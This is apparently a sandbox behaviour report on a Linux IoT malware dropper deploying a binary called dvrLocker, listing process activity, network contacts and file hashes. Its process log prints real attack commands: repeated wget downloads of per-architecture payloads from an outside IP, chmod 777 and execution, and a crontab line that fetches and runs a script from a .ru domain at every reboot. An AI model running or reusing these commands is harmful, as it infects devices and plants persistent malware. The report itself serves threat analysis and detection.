File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/2/cmdline /tmp/lib/dvrLocker N/A
File opened for reading /proc/876/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/866/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/854/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/881/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/899/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/927/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/825/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/838/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/908/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/917/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/913/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/819/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/836/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/869/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/883/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/896/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/904/status /tmp/lib/dvrLocker N/A
File opened for reading /proc/filesystems /bin/ls N/A
File opened for reading /proc/filesystems /bin/ls N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/lib/dvrLocker /tmp/l.sh N/A

Processes

/tmp/l.sh

[/tmp/l.sh]

/bin/ls

[ls -l /proc/1/exe]

/bin/ls

[ls -l /proc/10/exe]

/bin/ls

[ls -l /proc/105/exe]

/bin/ls

[ls -l /proc/11/exe]

/bin/ls

[ls -l /proc/113/exe]

/bin/ls

[ls -l /proc/114/exe]

/bin/ls

[ls -l /proc/12/exe]

/bin/ls

[ls -l /proc/13/exe]

/bin/ls

[ls -l /proc/14/exe]

/bin/ls

[ls -l /proc/143/exe]

/bin/ls

[ls -l /proc/147/exe]

/bin/ls

[ls -l /proc/15/exe]

/bin/ls

[ls -l /proc/16/exe]

/bin/ls

[ls -l /proc/166/exe]

/bin/ls

[ls -l /proc/17/exe]

/bin/ls

[ls -l /proc/18/exe]

/bin/ls

[ls -l /proc/19/exe]

/bin/ls

[ls -l /proc/2/exe]

/bin/ls

[ls -l /proc/20/exe]

/bin/ls

[ls -l /proc/21/exe]

/bin/ls

[ls -l /proc/22/exe]

/bin/ls

[ls -l /proc/23/exe]

/bin/ls

[ls -l /proc/236/exe]

/bin/ls

[ls -l /proc/24/exe]

/bin/ls

[ls -l /proc/3/exe]

/bin/ls

[ls -l /proc/327/exe]

/bin/ls

[ls -l /proc/329/exe]

/bin/ls

[ls -l /proc/331/exe]

/bin/ls

[ls -l /proc/335/exe]

/bin/ls

[ls -l /proc/340/exe]

/bin/ls

[ls -l /proc/36/exe]

/bin/ls

[ls -l /proc/37/exe]

/bin/ls

[ls -l /proc/379/exe]

/bin/ls

[ls -l /proc/380/exe]

/bin/ls

[ls -l /proc/384/exe]

/bin/ls

[ls -l /proc/4/exe]

/bin/ls

[ls -l /proc/425/exe]

/bin/ls

[ls -l /proc/5/exe]

/bin/ls

[ls -l /proc/6/exe]

/bin/ls

[ls -l /proc/670/exe]

/bin/ls

[ls -l /proc/673/exe]

/bin/ls

[ls -l /proc/677/exe]

/bin/ls

[ls -l /proc/678/exe]

/bin/ls

[ls -l /proc/684/exe]

/bin/ls

[ls -l /proc/7/exe]

/bin/ls

[ls -l /proc/70/exe]

/bin/ls

[ls -l /proc/700/exe]

/bin/ls

[ls -l /proc/701/exe]

/bin/ls

[ls -l /proc/703/exe]

/bin/ls

[ls -l /proc/704/exe]

/bin/ls

[ls -l /proc/706/exe]

/bin/ls

[ls -l /proc/707/exe]

/bin/ls

[ls -l /proc/708/exe]

/bin/ls

[ls -l /proc/71/exe]

/bin/ls

[ls -l /proc/72/exe]

/bin/ls

[ls -l /proc/73/exe]

/bin/ls

[ls -l /proc/74/exe]

/bin/ls

[ls -l /proc/75/exe]

/bin/ls

[ls -l /proc/76/exe]

/bin/ls

[ls -l /proc/77/exe]

/bin/ls

[ls -l /proc/78/exe]

/bin/ls

[ls -l /proc/8/exe]

/bin/ls

[ls -l /proc/81/exe]

/bin/ls

[ls -l /proc/83/exe]

/bin/ls

[ls -l /proc/9/exe]

/bin/rm

[rm -rf /tmp/lib/]

/bin/rm

[rm -rf /tmp/lib/dvrLocker]

/bin/mkdir

[mkdir /tmp/lib/]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -l]

/usr/bin/crontab

[crontab -]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/tmp/lib/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

/bin/rm

[rm -rf /mnt/dvrLocker]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/usr/bin/wget

[wget http://45.202.35.91/x86 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/usr/bin/wget

[wget http://45.202.35.91/mpsl -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mpsl]

/usr/bin/wget

[wget http://45.202.35.91/mips -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf mips]

/usr/bin/wget

[wget http://45.202.35.91/arm -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm]

/usr/bin/wget

[wget http://45.202.35.91/arm5 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/bin/rm

[rm -rf arm5]

/usr/bin/wget

[wget http://45.202.35.91/ppc -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf ppc]

/usr/bin/wget

[wget http://45.202.35.91/arm7 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm7]

/usr/bin/wget

[wget http://45.202.35.91/arm6 -O -]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf arm6]

/bin/chmod

[chmod 777 dvrLocker]

/mnt/dvrLocker

[./dvrLocker tplink.new]

/bin/rm

[rm -rf x86]

Network

Country Destination Domain Proto
UA 45.202.35.91:80 45.202.35.91 tcp
DE 80.152.203.134:53 kingstonwikkerink.dyn udp
HK 193.233.193.45:20155 kingstonwikkerink.dyn tcp
CN 43.226.79.41:62371 udp

Files

/tmp/lib/dvrLocker

MD5 4ad582d49f505bfab7de84881998685b
SHA1 5f09f4baed114b594729ded91e2c4d263f0e2754
SHA256 b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1
SHA512 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4

/var/spool/cron/crontabs/tmp.u40wTl

MD5 8cd195f9cc1ac87a6d7e9413b64538d9
SHA1 9e110eaec931ddff0d54fa3372efd7b8c089975c
SHA256 8cb497497f0f07ff2bca1cf7c4fcecad4c5f2a942fa86a8cdf9b1d621f96dd68
SHA512 2e70f0d3e836619adffa3dbf0da481f42e737cba59a83418e387a34fe7ce781eef50c1cdba4e166c1f87ae237817479b474e53702d7e9da746c22cbb4c690652